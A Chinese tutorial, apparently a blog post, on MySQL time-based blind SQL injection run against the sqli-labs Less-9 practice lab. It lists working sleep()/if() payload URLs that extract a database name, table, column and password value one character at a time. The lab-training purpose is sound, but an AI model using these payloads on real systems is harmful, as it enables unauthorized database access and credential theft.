MySQL延时注入

生活不止眼前的苟且，还有房费、饭费、水电费。。。

---- 网易云热评

一、常用函数

1、sleep(5)：延时5秒

2、if(a,b,c)：a为条件，正确返回b，否则返回c

二、实例测试

1、找到可以注入的payload，服务器反映5秒才有响应

http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(5) --+

​2、获取数据库长度，如果数据库名的长度等于8停留5秒

http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((length(database())=8),5,0)) --+

3、获取数据库名称的每个字母，如果判断正确停留5秒，最后知道数据库名字为"security"

http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid(database(),1,1)=‘s‘),5,0)) --+ http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid(database(),2,1)=‘e‘),5,0)) --+

4、获取数据库中的表名，最后得出一个表为users

http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid((ｓｅｌｅｃｔ table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)=‘u‘),5,0)) --+http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid((ｓｅｌｅｃｔ table_name from information_schema.tables where table_schema=database() limit 3,1),2,1)=‘s‘),5,0)) --+

5、获取users表中的字段，最后得出一个password字段

http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid((ｓｅｌｅｃｔ column_name from information_schema.columns where table_name=‘users‘ limit 13,1),1,1)=‘p‘),5,0)) --+http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid((ｓｅｌｅｃｔ column_name from information_schema.columns where table_name=‘users‘ limit 13,1),2,1)=‘a‘),5,0)) --+

6、获取password字段内容，最终获取一个名为admin的内容

http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid((ｓｅｌｅｃｔ password from users limit 7,1),1,1)=‘a‘ ),5,0)) --+http://192.168.139.129/sqli/Less-9/?id=1‘ and sleep(if((mid((ｓｅｌｅｃｔ password from users limit 7,1),2,1)=‘d‘ ),5,0)) --+

禁止非法，后果自负